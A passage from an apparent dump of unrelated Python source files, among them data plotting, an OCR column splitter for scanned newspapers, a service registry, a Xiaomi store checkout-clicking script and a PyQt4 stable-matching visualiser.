    if 'airflow_pg' not in [x.name for x in client.containers.list()]:
        # launch postgres backend
        pg = client.containers.run(image='postgres',
                                   name='airflow_pg',
                                   auto_remove=True,
                                   detach=True,
                                   environment={
                                       'POSTGRES_PASSWORD': 'airflow',
                                       'POSTGRES_USER': 'airflow',
                                       'PGDATA': '/airflow/data'
                                   },
                                   volumes={'airflow_pg_data': {'bind': '/airflow/data', 'mode': 'rw'}},
                                   ports={'5432/tcp': 5432}
                                   )
|
4,325 | c218428908c28a8c65bd72e66dcddaf7db1909d7 | from __future__ import absolute_import
from talin.quotations import register_xpath_extensions
def init():
register_xpath_extensions() |
4,326 | 15bf84b716caf66a23706e9292b47ddb9bf4d35e | num = int(input("Enter the number: "))
print("Multiplication Table of", num)
for i in range(1, 10):
    # BUG FIX: the separator between the operands was the stray letter "a";
    # a multiplication table conventionally prints "x" (e.g. "5 x 3 = 15").
    print(num, "x", i, "=", num * i)
|
4,327 | 0c7816028e6cbd12684b0c7484835e735f1d2838 | #!/usr/bin/env python3
import argparse
from glob import glob
import sys
import numpy as np
import matplotlib.pyplot as plt
import pysam
import math
import pandas as pd
import haplotagging_stats
import os
import collections
import seaborn as sns
# Column names expected in the input CSV.
NUM_CONTIGS="num_contigs"
TOTAL_LEN="total_len"
HAPLOTYPE="haplotype"
HAPLO_SEX="haplotype-sex"
SEX="sex"
# Shell pipelines used to produce the contig-stats CSV from the QC CSV:
# cat Y1_assemblies_v2_genbank_QC.csv | sed 's/,/\t/g' | awk '{print $1,$2,$3,"Maternal","\n",$1,$6,$7,"Paternal"}' | sed 's/^ //' | sed 's/ $//' | sed 's/ /,/g' | sed 's/mat_//g' | sed 's/pat_//g' >Y1_assemblies_v2_genbank_QC.contig_stats.csv
# cat Y1_assemblies_v2_genbank_QC.full.csv | sed 's/,/\t/g' | awk '{print $1,$2,$3,"Maternal","Maternal-",$23,$23,"\n",$1,$6,$7,"Paternal","Paternal-",$23,$23}' | sed 's/- /-/g' | sed 's/^ //' | sed 's/ $//' | sed 's/ /,/g' | sed 's/mat_//g' | sed 's/pat_//g' >Y1_assemblies_v2_genbank_QC.contig_stats.csv
def parse_args(args = None):
    """Build the CLI parser and parse *args* (None means sys.argv)."""
    parser = argparse.ArgumentParser("Plots information from haplotagging_stats tsv")
    parser.add_argument('--input_csv', '-i', dest='input_csv', default=None, required=True, type=str,
                        help='CSV file holding data')
    parser.add_argument('--figure_name', '-f', dest='figure_name', default="HPRC_contig_stats", required=False, type=str,
                        help='Figure name')
    if args is None:
        return parser.parse_args()
    return parser.parse_args(args)
def log(msg):
    """Write *msg* (plus a newline) to stderr."""
    sys.stderr.write(str(msg) + "\n")
def get_color(filename):
    """Pick a plot color from a filename: maternal -> darkred,
    paternal -> darkblue, anything else -> black (maternal wins ties)."""
    lowered = filename.lower()
    for token, color in (("maternal", "darkred"), ("paternal", "darkblue")):
        if token in lowered:
            return color
    return "black"
def main():
    """Read the contig-stats CSV and draw box+swarm plots of contig count and
    total length per haplotype/sex group, saving PNG and PDF copies."""
    args = parse_args()
    df = pd.read_csv(args.input_csv)
    print(df.head())
    # sns.set_palette(sns.color_palette(["darkred", "darkblue"]))
    # sns.boxplot(x=HAPLOTYPE, y=NUM_CONTIGS, data=df)#, palette={"Maternal":"darkred","Paternal":"darkblue"})
    # spax = sns.swarmplot(x=HAPLOTYPE, y=NUM_CONTIGS, hue=SEX, data=df, palette={"Female":"fuchsia","Male":"cyan"}) #color="fuchsia")
    # Contig-count plot: boxes colored by haplotype, points colored by sex.
    sns.boxplot(x=HAPLO_SEX, y=NUM_CONTIGS, data=df, order=["Maternal-Female", "Maternal-Male", "Paternal-Female", "Paternal-Male"],
                palette={"Maternal-Male":"darkred","Maternal-Female":"darkred","Paternal-Male":"darkblue","Paternal-Female":"darkblue"})
    spax = sns.swarmplot(x=HAPLO_SEX, y=NUM_CONTIGS, data=df, order=["Maternal-Female", "Maternal-Male", "Paternal-Female", "Paternal-Male"],
                palette={"Maternal-Male":"royalblue","Maternal-Female":"crimson","Paternal-Male":"royalblue","Paternal-Female":"crimson"})
    plt.title("")
    plt.ylabel("Contig Count")
    plt.xlabel("Haplotype")
    plt.tight_layout()
    # plt.set_size_inches(12, 12)
    #
    if args.figure_name is not None:
        plt.savefig(args.figure_name+".contig_count.png", format='png', dpi=200)
        plt.savefig(args.figure_name+".contig_count.pdf", format='pdf', dpi=300)
    plt.show()
    plt.close()
    # sns.boxplot(x=HAPLOTYPE, y=TOTAL_LEN, data=df)#, palette={"Maternal":"darkred","Paternal":"darkblue"})
    # spax = sns.swarmplot(x=HAPLOTYPE, y=TOTAL_LEN, hue=SEX, data=df, palette={"Female":"fuchsia","Male":"cyan"}) #color="fuchsia")
    # Same plot for total assembled length.
    sns.boxplot(x=HAPLO_SEX, y=TOTAL_LEN, data=df, order=["Maternal-Female", "Maternal-Male", "Paternal-Female", "Paternal-Male"],
                palette={"Maternal-Male":"darkred","Maternal-Female":"darkred","Paternal-Male":"darkblue","Paternal-Female":"darkblue"})
    spax = sns.swarmplot(x=HAPLO_SEX, y=TOTAL_LEN, data=df, order=["Maternal-Female", "Maternal-Male", "Paternal-Female", "Paternal-Male"],
                palette={"Maternal-Male":"royalblue","Maternal-Female":"crimson","Paternal-Male":"royalblue","Paternal-Female":"crimson"})
    plt.title("")
    plt.ylabel("Total Length")
    plt.xlabel("Haplotype")
    plt.tight_layout()
    # plt.set_size_inches(12, 12)
    #
    if args.figure_name is not None:
        plt.savefig(args.figure_name+".total_len.png", format='png', dpi=200)
        plt.savefig(args.figure_name+".total_len.pdf", format='pdf', dpi=300)
    plt.show()
if __name__ == "__main__":
    main()
|
4,328 | d2a9a2fd3a1118c0855b8f77ce4c25cc6b4e8f87 | import random
def get_ticket():
    """Return a 28-character random ticket drawn from a lowercase+digit
    alphabet.

    NOTE(review): the alphabet contains 'r' twice and omits 'l' -- likely a
    typo; also, for security-sensitive tokens prefer the `secrets` module.
    """
    alphabet = 'abcdefghijkrmnopqrstuvwxyz1234567890'
    return ''.join(random.choice(alphabet) for _ in range(28))
|
4,329 | f4fa7563d2cce5ee28198d4974a4276d9f71f20b | import sys
import pandas as pd
from components.helpers.Logger import Logger
class DataFrameCreatorBase:
    """
    DataFrameCreatorBase

    Singleton-style base class: construction loads files/input/<input_file>
    into a pandas DataFrame and then calls the subclass _clean_df() hook.
    """
    # Presumably the first date of the tracked series -- TODO confirm usage.
    START_DATE = "03/16/2020"
    def __init__(self, input_file):
        self._input_file = input_file
        self.df = self._read_raw_csv()
        self._clean_df()
    def __new__(cls, *args, **kwargs):
        # NOTE(review): singleton via a class attribute; __init__ still runs
        # on every construction, so the shared instance re-reads the CSV each
        # time -- confirm that is intended.
        if not hasattr(cls, 'instance'):
            cls.instance = super().__new__(cls)
        return cls.instance
    def _read_raw_csv(self):
        """Read the input CSV into a DataFrame; log and exit(1) on failure."""
        try:
            return pd.read_csv(f'files/input/{self._input_file}')
        except Exception as e:
            Logger.log_message(
                Logger.ERROR,
                f"Failed to convert csv file {self._input_file} to dataframe: {e}"
            )
            sys.exit(1)
def _clean_df(self):
pass |
4,330 | 71cee06ce697030fd0cea363ddecaa411b39544d | from appConfig.App import app, db
import os
dbDir = os.path.dirname(__file__)
# staticFolder = '%sstatic' % os.sep
dbDir = '%s%sappConfig%smine.db' % (dbDir, os.sep, os.sep)
if not os.path.exists(dbDir):
# 创建数据库并创建表
db.create_all()
# app._static_folder = staticFolder
@app.route('/')
def hello_world():
return 'Hello Waeweorld!'
if __name__ == '__main__':
app.run()
|
4,331 | 23937ae531cc95069a1319f8c77a459ba7645363 | # write dictionary objects to be stored in a binary file
import pickle
# Persist several employee-record dictionaries into one binary file, in order.
emp1 = {"Empno" : 1201, "Name" : "Anushree", "Age" : 25, "Salary" : 47000}
emp2 = {"Empno" : 1211, "Name" : "Zoya", "Age" : 30, "Salary" : 48000}
emp3 = {"Empno" : 1251, "Name" : "Simarjeet", "Age" : 27, "Salary" : 49000}
emp4 = {"Empno" : 1266, "Name" : "Alex", "Age" : 29, "Salary" : 50000}
empObj = open('Emp.dat',"wb")
# Dump each record in sequence; they can be re-read with repeated pickle.load.
for record in (emp1, emp2, emp3, emp4):
    pickle.dump(record, empObj)
print("Successfully written four dictionaries")
empObj.close()
|
4,332 | ba41f2a564f46032dbf72f7d17b2ea6deaa81b10 | from __future__ import unicode_literals
import abc
import logging
import six
import semantic_version
from lymph.utils import observables, hash_id
from lymph.core.versioning import compatible, serialize_version
logger = logging.getLogger(__name__)
# Event types propagated by Service when instances change.
ADDED = 'ADDED'
REMOVED = 'REMOVED'
UPDATED = 'UPDATED'
class ServiceInstance(object):
    """A single running instance of a service, described by registry info."""
    def __init__(self, id=None, identity=None, **info):
        self.id = id
        # Derive a stable identity from the endpoint when none is supplied.
        self.identity = identity if identity else hash_id(info.get('endpoint'))
        self.info = {}
        self.update(**info)
    def update(self, **info):
        """Merge new registry info; a 'version' entry is parsed into a
        semantic_version.Version.

        NOTE(review): when no truthy 'version' is supplied on the first call,
        self.version is never assigned, so later attribute access raises --
        confirm callers always provide a version.
        """
        version = info.pop('version', None)
        if version:
            version = semantic_version.Version(version)
            self.version = version
        self.info.update(info)
    def __getattr__(self, name):
        # Expose the remaining info entries as attributes.
        try:
            return self.info[name]
        except KeyError:
            raise AttributeError(name)
    def serialize(self):
        """Return a plain dict representation suitable for transport."""
        d = {
            'id': self.id,
            'identity': self.identity,
            'version': serialize_version(self.version),
        }
        d.update(self.info)
        return d
@six.add_metaclass(abc.ABCMeta)
class InstanceSet(observables.Observable):
    """Abstract observable collection of service instances."""
    @abc.abstractmethod
    def __iter__(self):
        raise NotImplementedError()
    def match_version(self, version):
        """Return a view of this set limited to instances compatible with
        *version*."""
        return VersionedServiceView(self, version)
class Service(InstanceSet):
    """A named, observable set of ServiceInstance objects keyed by id."""
    def __init__(self, name=None, instances=()):
        super(Service, self).__init__()
        self.name = name
        self.instances = {instance.id: instance for instance in instances}
        self.version = None
    def __str__(self):
        return self.name
    def __iter__(self):
        return six.itervalues(self.instances)
    def __len__(self):
        return len(self.instances)
    def get_instance(self, prefix):
        """Return the first instance whose id starts with *prefix*, else None."""
        for candidate in six.itervalues(self.instances):
            if candidate.id.startswith(prefix):
                return candidate
        return None
    def identities(self):
        """Return the list of known instance ids."""
        return list(self.instances.keys())
    def remove(self, instance_id):
        """Drop an instance by id (no-op if unknown) and notify observers."""
        instance = self.instances.pop(instance_id, None)
        if instance is not None:
            self.notify_observers(REMOVED, instance)
    def update(self, instance_id, **info):
        """Create or refresh an instance and emit ADDED or UPDATED."""
        if instance_id in self.instances:
            instance = self.instances[instance_id]
            instance.update(**info)
            self.notify_observers(UPDATED, instance)
        else:
            instance = self.instances[instance_id] = ServiceInstance(**info)
            self.notify_observers(ADDED, instance)
class VersionedServiceView(InstanceSet):
    """Filtered view of a Service yielding only version-compatible instances."""
    def __init__(self, service, version):
        self.service = service
        self.spec = compatible(version)
        self.version = version
    def __str__(self):
        return '%s@%s' % (self.name, self.version)
    @property
    def name(self):
        return self.service.name
    def __iter__(self):
        return (inst for inst in self.service if inst.version in self.spec)
    def observe(self, *args, **kwargs):
        # Observation is delegated to the underlying service.
        return self.service.observe(*args, **kwargs)
4,333 | 91d240b02b9d7a6c569656337521482d57918754 |
# https://github.com/jscancella/NYTribuneOCRExperiments/blob/master/findText_usingSums.py
import os
import io
from pathlib import Path
import sys
os.environ['OPENCV_IO_ENABLE_JASPER']='True' # has to be set before importing cv2 otherwise it won't read the variable
import numpy as np
import cv2
import subprocess
from multiprocessing import Pool
from scipy.signal import find_peaks, find_peaks_cwt
import scipy.ndimage as ndimage
from IPython.display import Image as KImage
#custom kernel that is used to blend together text in the Y axis
# (9x9 kernel with a single vertical line of 1s: dilating with it smears
# foreground pixels vertically so lines of text merge into solid columns)
DILATE_KERNEL = np.array([
    [0, 0, 0, 0, 1, 0, 0, 0, 0],
    [0, 0, 0, 0, 1, 0, 0, 0, 0],
    [0, 0, 0, 0, 1, 0, 0, 0, 0],
    [0, 0, 0, 0, 1, 0, 0, 0, 0],
    [0, 0, 0, 0, 1, 0, 0, 0, 0],
    [0, 0, 0, 0, 1, 0, 0, 0, 0],
    [0, 0, 0, 0, 1, 0, 0, 0, 0],
    [0, 0, 0, 0, 1, 0, 0, 0, 0],
    [0, 0, 0, 0, 1, 0, 0, 0, 0]], dtype=np.uint8)
# Run adaptative thresholding (is slow af compared to not using it in pipeline)
def adaptative_thresholding(img, threshold):
    """Adaptive (integral-image based) thresholding of a BGR image.

    img: BGR image array as returned by cv2.imread.
    threshold: percentage (0-100); higher values turn more pixels black.
    Returns a uint8 binary image (0 or 255) of the same height/width.
    """
    # Convert image to grayscale
    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
    # Original image size
    orignrows, origncols = gray.shape
    # Window size: roughly 1/16 of each dimension.
    M = int(np.floor(orignrows/16) + 1)
    N = int(np.floor(origncols/16) + 1)
    # Pad the image so windows centered near the border stay in bounds.
    Mextend = round(M/2)-1
    Nextend = round(N/2)-1
    aux = cv2.copyMakeBorder(gray, top=Mextend, bottom=Mextend, left=Nextend,
                             right=Nextend, borderType=cv2.BORDER_REFLECT)
    windows = np.zeros((M, N), np.int32)
    # Integral (summed-area) image of the padded input.
    imageIntegral = cv2.integral(aux, windows, -1)
    nrows, ncols = imageIntegral.shape
    # Sum of each MxN window, computed from four integral-image corners.
    result = np.zeros((orignrows, origncols))
    for i in range(nrows-M):
        for j in range(ncols-N):
            result[i, j] = imageIntegral[i+M, j+N] - imageIntegral[i, j+N] + imageIntegral[i, j] - imageIntegral[i+M, j]
    # BUG FIX: np.bool was deprecated in NumPy 1.20 and removed in 1.24;
    # the builtin bool dtype is the supported equivalent.
    binar = np.ones((orignrows, origncols), dtype=bool)
    # Each pixel (weighted by the window area) is compared against the window
    # sum scaled by the threshold percentage.
    graymult = gray.astype('float64') * M * N
    binar[graymult <= result * (100.0 - threshold) / 100.0] = False
    # Boolean mask -> 0/255 uint8 image.
    binar = (255 * binar).astype(np.uint8)
    return binar
def Q_test(sorted_data):
    """Dixon's Q test at 95% confidence: return True when the smallest value
    of the (ascending) sorted data is a statistical outlier."""
    conf95_level = {3: .97, 4: .829, 5: .71, 6: .625, 7: .568, 8: .526, 9: .493}
    gap = abs(sorted_data[1] - sorted_data[0])
    spread = abs(sorted_data[-1] - sorted_data[0])
    q_exp = gap / spread
    print(str(gap) + ' / ' + str(spread))
    print("q_exp : " + str(q_exp))
    # Tables only go up to n=9; larger samples reuse the n=9 critical value.
    return q_exp > conf95_level[min(9, len(sorted_data))]
# static variables for clarity
COLUMNS = 0
GREEN = (0, 255, 0)
# parameters that can be tweaked
LINE_THICKNESS = 3 # how thick to make the line around the found contours in the debug output
PADDING = 10 # padding to add around the found possible column to help account for image skew and such
CREATE_COLUMN_OUTLINE_IMAGES = True # if we detect that we didn't find all the columns. Create a debug image (tiff) showing the columns that were found
def columnIndexes(a):
    """
    creates pair of indexes for left and right index of the image column
    For example [13, 1257, 2474, 3695, 4907, 6149]
    becomes: [[13 1257], [1257 2474], [2474 3695], [3695 4907], [4907 6149]]
    """
    # Pair each element with its successor: column i spans a[i]..a[i+1].
    return np.column_stack((a[:-1], a[1:]))
def convertToGrayscale(img):
    """Return a single-channel grayscale copy of a BGR image."""
    temp_img = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
    return temp_img
def invert(img):
    """ Black -> White | White -> Black """
    print("invert image")
    # Should we edit these parameters?
    #3/18/21 - experimented on threshold, 140 is good.
    # Binary inverse threshold: pixels above 140 become 0, the rest 255.
    _,temp_img = cv2.threshold(img, 140, 255, cv2.THRESH_BINARY_INV)
    return temp_img
def dilateDirection(img, debug=False):
    """
    It is just opposite of erosion. Here, a pixel element is '1' if atleast one pixel under the kernel is '1'.
    So it increases the white region in the image or size of foreground object increases.
    Normally, in cases like noise removal, erosion is followed by dilation.
    Because, erosion removes white noises, but it also shrinks our object.
    So we dilate it. Since noise is gone, they won't come back, but our object area increases.
    It is also useful in joining broken parts of an object.

    Uses the vertical DILATE_KERNEL so text gets smeared along the Y axis.
    """
    print("applying dilation morph")
    temp_img = cv2.dilate(img, DILATE_KERNEL, iterations=15) #the more iterations the more the text gets stretched in the Y axis, 15 seems about right.
    '''
    if debug:
        filepath = os.path.join(debugOutputDirectory, '%s-dilation.tiff' % basename)
        cv2.imwrite(filepath, temp_img)
    '''
    return temp_img
def createColumnImages(img, basename, directory):
    """
    we sum each column of the inverted image. The columns should show up as peaks in the sums
    uses scipy.signal.find_peaks to find those peaks and use them as column indexes

    Writes one cropped JPEG per detected column into `directory` and returns
    the list of written file paths (empty when no peaks were found).
    """
    files = []
    temp_img = convertToGrayscale(img)
    temp_img = invert(temp_img)
    temp_img = dilateDirection(temp_img)
    sums = np.sum(temp_img, axis = COLUMNS)
    sums[0] = 1000 # some random value so that find_peaks properly detects the peak for the left most column
    sums = sums * -4 # invert so that minimums become maximums and exagerate the data so it is more clear what the peaks are
    # NOTE(review): the comment says 800 but the code enforces 600 -- confirm.
    peaks, _ = find_peaks(sums, distance=600) # the column indexs of the img array, spaced at least 800 away from the previous peak
    sum_to_index = dict((sums[peaks[i]], peaks[i]) for i in range(len(peaks)))
    sorted_sums = sorted(sum_to_index.keys())
    '''
    qr = Q_test(sorted_sums)
    if qr:
        peaks = peaks[peaks != sum_to_index[sorted_sums[0]]]
    '''
    print("PeakNum, Sum, QRemove for " + basename)
    for x in peaks:
        print(str(x) + ', ' + str(sums[x]))
    print("----------")
    # No peaks at all: record the image as troublesome and bail out.
    if peaks.size == 0:
        with open('troublesomeImages.txt', 'a') as f:
            print("ERROR: something went wrong with finding the peaks for image: ", os.path.join(directory, basename))
            f.write(os.path.join(directory, basename) + ".jpg 0\n")
        return files
    peaks[0] = 0 # automatically make the left most column index the start of the image
    peaks[-1] =sums.size -1 # automatically make the right most column index the end of the image
    boxed = np.copy(img)
    # Fewer than 6 peaks means some columns were probably missed; log it.
    if peaks.size < 6:
        with open('troublesomeImages.txt', 'a') as f:
            print("found image that is causing problems: ", os.path.join(directory, basename))
            f.write(os.path.join(directory, basename) + ".jpg " + str(peaks.size) + "\n")
    columnIndexPairs = columnIndexes(peaks)
    ystart = 0
    yend = img.shape[0]
    # Crop each [left, right] pair (plus PADDING for skew) and save it.
    for columnIndexPair in columnIndexPairs:
        xstart = max(columnIndexPair[0]-PADDING, 0)
        xend = min(columnIndexPair[1]+PADDING, img.shape[1])
        if not os.path.exists(directory):
            os.makedirs(directory)
        filepath = os.path.join(directory, '%s_xStart%s_xEnd%s.jpg' % (basename, xstart,xend))
        files.append(filepath)
        crop_img = img[ystart:yend, xstart:xend]
        print("writing out cropped image: ", filepath)
        # Apply adaptative thresholding to the image with a threshold of 25/100
        #crop_img = adaptative_thresholding(crop_img, 25)
        if not cv2.imwrite(filepath, crop_img):
            print('failed')
        if CREATE_COLUMN_OUTLINE_IMAGES:
            cv2.rectangle(boxed,(xstart,ystart),(xend,yend), GREEN, LINE_THICKNESS)
    # Debug image showing all detected column rectangles.
    if CREATE_COLUMN_OUTLINE_IMAGES:
        filepath = os.path.join(directory, '%s-contours.jpeg' % basename)
        cv2.imwrite(filepath, boxed, [cv2.IMWRITE_JPEG_QUALITY, 50])
    # For removing the old image?
    # os.remove(os.path.join(directory, basename + ".jp2"))
    return files
def invert_experiment():
    """Sweep inverse-threshold values (1..181 step 20) over one sample page
    and write each result out for visual comparison."""
    test_img = cv2.imread('./ocr/data/8k71pf94q/1_commonwealth_8k71pf94q_accessFull.jpg')
    for thresh in range(1, 200, 20):
        print('writing thresh= ' + str(thresh))
        _,temp_img = cv2.threshold(test_img, thresh, 255, cv2.THRESH_BINARY_INV)
        cv2.imwrite('./ocr/test_images/thresh='+str(thresh)+'.jpg', temp_img)
def test(img, basename):
    """Ad-hoc experiment: grayscale + invert + dilate one image and write the
    dilated result; the commented-out lines are prior contour experiments."""
    #h, w, _ = img.shape
    #test_img = cv2.imread('./ocr/data/8k71pf94q/2_commonwealth_8k71pf94q_accessFull.jpg')
    test_img = convertToGrayscale(img)
    #ret,test_img = cv2.threshold(test_img,25,255,0)
    #cv2.imwrite('./ocr/test_images/contours/'+basename+'prepixelcrop.jpg', test_img)
    #test_img = test_img[10:h-10, 10: w-10]
    #y_nonzero, x_nonzero = np.nonzero(test_img)
    #test_img = test_img[np.min(y_nonzero):np.max(y_nonzero), np.min(x_nonzero):np.max(x_nonzero)]
    test_img = invert(test_img)
    test_img = dilateDirection(test_img)
    #contours,hierarchy = cv2.findContours(test_img,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)
    #cnt = contours[0]
    #x,y,w,h = cv2.boundingRect(cnt)
    #test_img = cv2.rectangle(img,(10,10),(w-10, h-10), GREEN, LINE_THICKNESS)
    #test_img = cv2.drawContours(test_img, contours, -1, GREEN, LINE_THICKNESS)
    #crop = test_img[y:y+h,x:x+w]
    cv2.imwrite('./ocr/test_images/contours/'+basename+'dilated.jpg', test_img)
    '''
    for r in range(0, 40, 5):
        name = 'rank=' + str(r) + ".jpg"
        path = './ocr/test_images/' + name
        new_img = ndimage.rank_filter(test_img, rank=r, size=20)
        print("writing " + name)
        cv2.imwrite(path, new_img)
    '''
    #cv2.imwrite('./ocr/test_images/inverted.jpg', test_img)
if __name__ == "__main__":
    print("STARTING")
    # Fix: the same read-folder/crop-columns loop was copy-pasted three times
    # (once per collection) and followed by a large dead triple-quoted block;
    # collapsed into one parameterised loop producing identical paths/calls.
    for collection in ('gb19gw39h', '8k71pf94q', 'mc87rq85m'):
        data_dir = './ocr/data/' + collection + '/'
        for f in os.listdir(data_dir):
            if f.endswith(".jpg"):
                # Column crops land in ./ocr/columns/<collection>/,
                # named <collection>-<first char of source file>.
                createColumnImages(cv2.imread(os.path.join(data_dir, f)),
                                   collection + '-' + f[0],
                                   './ocr/columns/' + collection + '/')
|
4,334 | 1e87f625fb7bd9f9bf4233229332c909702954a5 | from helper import *
async def main(URL, buy_time):
    """Drive the Mi-store purchase flow.

    Opens a login page for manual QR login, navigates to the product page,
    waits until `buy_time`, then retries the add-to-cart button, follows the
    redirect, clicks through to the cart, and finally leaves time to pay.

    Parameters
    ----------
    URL : str
        Product page URL.
    buy_time : str
        Sale start time, e.g. '2020-02-06 12:55:50' (consumed by sleep_time).
    """
    browser, page = await get_window()
    # 30 s for the user to scan the QR code and log in.
    await page.goto('https://account.xiaomi.com/pass/serviceLogin?callback=http%3A%2F%2Forder.mi.com%2Flogin%2Fcallback%3Ffollowup%3Dhttps%253A%252F%252Fwww.mi.com%252F%26sign%3DNzY3MDk1YzczNmUwMGM4ODAxOWE0NjRiNTU5ZGQyMzFhYjFmOGU0Nw%2C%2C&sid=mi_eshop&_bannerBiz=mistore&_qrsize=180')
    await asyncio.sleep(30)
    # 10 s to pick the product variant.
    await page.goto(URL)
    await asyncio.sleep(10)
    await sleep_time(buy_time)
    old_url = page.url
    # Add to cart, retrying until the button becomes clickable.
    index = 0  # BUG FIX: counter was re-initialised inside the loop, so it was always 0
    while True:
        try:
            print(f'重试 {index}')
            # Click the "add to cart" button.
            await page.click('[class="btn btn-primary"]')
            break
        except Exception:  # narrowed from bare except; still best-effort retry
            index += 1
            await asyncio.sleep(CLICK_FREQUENCY)
    # Wait for the page to navigate away.
    while True:
        if page.url != old_url:
            break
        await asyncio.sleep(CLICK_FREQUENCY)
    while True:
        try:
            # Click the "go to cart" button (same CSS class on the next page).
            await page.click('[class="btn btn-primary"]')
            break
        except Exception:
            await asyncio.sleep(CLICK_FREQUENCY)
    # Leave 100 s for manual payment before closing the browser.
    await asyncio.sleep(100)
    await close_window(browser)
if __name__ == '__main__':
    # Prompt for the product link and sale start time, then run the bot.
    item_url = input('宝贝链接:\n')
    start_time = input('请输入开售时间 【2020-02-06(空格)12:55:50】\n')
    asyncio.run(main(item_url, start_time))
4,335 | edbb721784dff81e3e1ab5e0458a4080508807fe | # -*- coding:utf-8 -*-
import sys
from PyQt4 import QtGui,QtCore
import experiment
class Node(QtGui.QGraphicsEllipseItem):
    """Ellipse scene item that carries a lookup name and a configurable fill."""

    def __init__(self, name):
        super(Node, self).__init__()
        self.__name = name

    def getName(self):
        """Return the name given at construction."""
        return self.__name

    def changeBrush(self, color, style):
        """Fill the ellipse with an (r, g, b) color using the given brush style."""
        brush = QtGui.QBrush()
        brush.setStyle(style)
        tint = brush.color()
        tint.setRgb(*color)
        brush.setColor(tint)
        self.setBrush(brush)
class Link(QtGui.QGraphicsLineItem):
    """Line scene item tagged with a name and a mutable link type (e.g. 'marry')."""

    def __init__(self, name, link_type):
        super(Link, self).__init__()
        self.__link_type = link_type
        self.__name = name

    def getName(self):
        """Return the link's name (typically 'man-woman' indices)."""
        return self.__name

    def getType(self):
        """Return the current link type tag."""
        return self.__link_type

    def changeType(self, link_type):
        """Replace the link type tag."""
        self.__link_type = link_type

    def changeColor(self, color):
        """Draw the line with an (r, g, b) pen color."""
        pen = QtGui.QPen()
        tint = pen.color()
        tint.setRgb(*color)
        pen.setColor(tint)
        self.setPen(pen)
class Text(QtGui.QGraphicsTextItem):
    """Text scene item that remembers a lookup name alongside its displayed text."""

    def __init__(self, name, text):
        super(Text, self).__init__(text)
        self.__name = name

    def getName(self):
        """Return the lookup name."""
        return self.__name
class GUI(QtGui.QWidget):
    """Main window visualising a stable-matching experiment step by step.

    Two synchronised graphics scenes are shown: `statu_scene` holds the current
    pairings, while `history_scene` additionally shows proposals that failed or
    broke an existing pairing during the latest step/epoch. Progress is driven
    by three buttons (STEP / EPOCH / END) whose textual reports from the
    matching object are parsed by __refreshViewStep.
    """
    def __init__(self):
        super(GUI, self).__init__()
        # NOTE(review): semantics of Experiments(20, 3) arguments come from the
        # experiment module -- presumably population size and a rank parameter; confirm there.
        self.exp = experiment.Experiments(20,3)
        self.matching = self.exp.unidirectional_match()
        self.man_rank, self.woman_rank = self.matching.get_avg_rank()
        self.man_spouse, self.woman_spouse = self.matching.get_spouse_rank()
        self.initUI()
        self.showMaximized()

    def initUI(self):
        # Build the layout: three buttons, a log pane, and the two scene views.
        self.setWindowTitle(' Stable Matching ')
        grid = QtGui.QGridLayout()
        step_button = QtGui.QPushButton('STEP',self)
        epoch_button = QtGui.QPushButton('EPOCH',self)
        end_button = QtGui.QPushButton('END',self)
        self.showText = QtGui.QTextEdit(self)
        self.showText.setText('START! ')
        # Current-state scene/view.
        self.statu_scene = QtGui.QGraphicsScene(self)
        self.initScene(self.statu_scene)
        self.statu_view = QtGui.QGraphicsView()
        self.statu_view.setScene(self.statu_scene)
        self.statu_view.setMinimumSize(600,600)
        self.statu_view.show()
        # Per-step history scene/view.
        self.history_scene = QtGui.QGraphicsScene(self)
        self.initScene(self.history_scene)
        self.history_view = QtGui.QGraphicsView()
        self.history_view.setScene(self.history_scene)
        self.history_view.setMinimumSize(600,600)
        self.history_view.show()
        grid.addWidget(step_button,1,1)
        grid.addWidget(epoch_button,2,1)
        grid.addWidget(end_button,3,1)
        grid.addWidget(self.showText,1,2,4,1)
        grid.addWidget(self.statu_view,1,3,4,1)
        grid.addWidget(self.history_view,1,4,4,1)
        self.setLayout(grid)
        # Old-style PyQt4 signal wiring.
        self.connect(step_button,QtCore.SIGNAL('clicked()'),self.nextStep)
        self.connect(epoch_button,QtCore.SIGNAL('clicked()'),self.nextEpoch)
        self.connect(end_button,QtCore.SIGNAL('clicked()'),self.exeToEnd)

    def initScene(self,scene):
        # Lay out men (blue, left column) and women (red, right column).
        man_num = self.exp.get_man_num()
        woman_num = self.exp.get_woman_num()
        length = max(man_num,woman_num) * 30  # 30 px vertical spacing per node
        scene.setSceneRect(0,0,600,length)
        for i in range(man_num):
            node = self.__addNode(scene, 'M_'+str(i),120,i*30,20,20,(0,0,255))
        for i in range(woman_num):
            node = self.__addNode(scene, 'W_'+str(i),480,i*30,20,20,(255,0,0))

    def __addNode(self, scene, name, x, y, w, h, color=(0,0,0)):
        # Create one person node plus its number, average-rank and spouse-rank labels.
        # `name` is '<M|W>_<index>'; labels are offset left for men, right for women.
        sex = name.split('_')[0]
        number = name.split('_')[1]
        rank_bias = spouse_bias = rank = 0
        if sex == 'M':
            rank = self.man_rank[int(number)]
            rank_bias = -2.0
            spouse_bias = -4.0
        elif sex == 'W':
            rank = self.woman_rank[int(number)]
            rank_bias = 2.0
            spouse_bias = 4.0
        node = Node(name)
        node.setRect(x,y,w,h)
        node.changeBrush(color,1)
        if int(number) < 10:
            number = '0' + number  # zero-pad for alignment
        # Number and rank labels are children of the node; the spouse label is
        # a named Text item added to the scene so it can be updated later.
        text = QtGui.QGraphicsTextItem (number, node)
        text.setPos(x,y)
        text.setTextWidth(1.5*w)
        font = QtGui.QFont('Times',8)
        font.setWeight(99)
        text.setFont(font)
        rank_text = QtGui.QGraphicsTextItem (str(rank), node)
        rank_text.setPos(x + rank_bias*w,y)
        rank_text.setTextWidth(2*w)
        font = QtGui.QFont('Times',8)
        font.setWeight(99)
        rank_text.setFont(font)
        spouse_text = Text(name+'_S', '-1')  # '-1' means currently unmatched
        spouse_text.setPos(x + spouse_bias*w,y)
        spouse_text.setTextWidth(1.5*w)
        font = QtGui.QFont('Times',8)
        font.setWeight(99)
        spouse_text.setFont(font)
        scene.addItem(node)
        scene.addItem(spouse_text)

    def __addLink(self, scene, name, node1, node2, color = (0,0,0), link_type = ''):
        # Draw a typed, colored line between the centers of two person nodes.
        center1 = node1.boundingRect().center()
        center2 = node2.boundingRect().center()
        name1 = node1.getName().split('_')[1]
        name2 = node2.getName().split('_')[1]
        link = Link(name1 + '-' + name2, link_type)
        link.setLine(center1.x(),center1.y(),center2.x(),center2.y())
        link.changeColor(color)
